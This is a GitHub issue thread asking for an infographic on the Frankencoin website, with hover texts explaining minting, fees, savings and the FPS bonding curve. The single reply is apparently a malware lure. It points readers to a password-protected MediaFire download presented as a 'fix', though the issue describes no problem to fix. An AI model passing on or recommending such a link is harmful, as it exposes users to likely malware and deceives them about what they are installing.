### ISSUE TITLE
Infographic

### ISSUE THREAD

**Issue by luziusmeisser** [Frankencoin-ZCHF/www#44]
Add an infographic to the website with the following logic:

![image](https://github.com/user-attachments/assets/3f03bd00-a131-4032-a8d0-76ca62e57f1e)

Hover texts:

1. Anyone can deposit a suitable collateral and mint Frankencoins. These Frankencoins have to be returned before you can get your collateral back.
2. When minting Frankencoins, a fee is paid to the equity reserve pool.
3. The minter sells the Frankencoins for 1 CHF each in the market.
4. Someone else buys some Frankencoins from Uniswap or other market places.
5. Frankencoins can be used to make Swiss franc payments in DeFi or elsewhere.
6. Recipients can sell sell their Frankencoins again on the marekt.
7. Someone who is interested in saving Swiss francs might buy some Frankencoins.
8. And then commit to lock them up in the system for a chosen period of time.
9. In return, the saver gets an interest that is paid out of the equity reserve pool.
10. Other might want to buy in order to speculate on the success of the whole system.
11. When adding capital to the equity reserve pool, you get freshly printed Frankencoin Pool Shares (FPS) in return. The amount of FPS is calculated using a bonding curve with the invariant "Market Cap = FPS Supply * FPS Price = 3 * Equity Reserve Pool", minus 0.3% issuance fee.
12. After a minimum holding duration of three months, the FPS can be returned to the system at the current price, minus 0.3% redemption fee.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
